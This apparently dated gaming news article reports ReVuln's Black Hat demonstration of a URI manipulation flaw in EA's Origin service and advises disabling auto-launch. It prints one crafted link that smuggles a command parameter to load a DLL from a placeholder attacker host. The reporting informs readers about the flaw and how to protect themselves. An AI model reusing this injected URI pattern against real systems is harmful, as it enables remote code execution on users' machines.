Forgot password
Enter the email address you used when you joined and we'll send you instructions to reset your password.
If you used Apple or Google to create your account, this process will create a password for your existing account.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.
Reset password instructions sent. If you have an account with us, you will receive an email within a few minutes.
Something went wrong. Try again or contact support if the problem persists.

EA’s Origin Service Can Be Exploited Due To A Bug

During the Black Hat security conference in Amsterdam, an attack was demonstrated on EA's infamous Origins service (think of it as the company's Steam). The fact that an estimation of 40 million accounts could be in danger is obviously alarming but what's even more distressing is how long it took to execute the attack -- it only took seconds.
This article is over 11 years old and may contain outdated information

Recommended Videos

During the Black Hat security conference in Amsterdam, an attack was demonstrated on EA’s infamous Origins service (think of it as the company’s Steam). The fact that an estimation of 40 million accounts could be in danger is obviously alarming but what’s even more distressing is how long it took to execute the attack — it only took seconds.

ReVuln, a company dedicated to security research and solutions, said that the potential victims don’t even have to have any interaction with their account to succumb to a possible attack. This particular attack is done by uniform resource identifier (URI) manipulation. Specifically, the URI’s used by Origin to automatically start games on an end user’s machine, whether that machine be a Mac or a PC. This essentially transforms Origin from a gaming platform to a launching pad for malware.

In a document published by ReVuln, company researchers Donato Ferrante and Luigi Auriemma said that malicious users can craft Internet links that execute malicious code remotely. As mentioned before, this affects computers — Mac or PC — with Origin installed on it. There’s also a video that demonstrates ReVuln  taking control of a computer with Origin and a copy of Crysis 3 installed. If you’re at all curious at what an authentic EA URI would be between a malicious one, here’s how it looks:

origin://LaunchGame/71503

This would launch the game in the way it should be launched. A fraudulent link would look more like this:

origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll

This, according to ReVuln, will load a Windows dynamic link library file in which an attacker is able to have open season with. EA, in an e-mail to Ars Technica, said that their team is constantly running hypotheticals and investigating into how to always update their security infrastructure. Basically, you’re going to want to change your settings in order to disable auto-launching — you’re going to want that link to prompt you for the time being.


We Got This Covered is supported by our audience. When you purchase through links on our site, we may earn a small affiliate commission. Learn more about our Affiliate Policy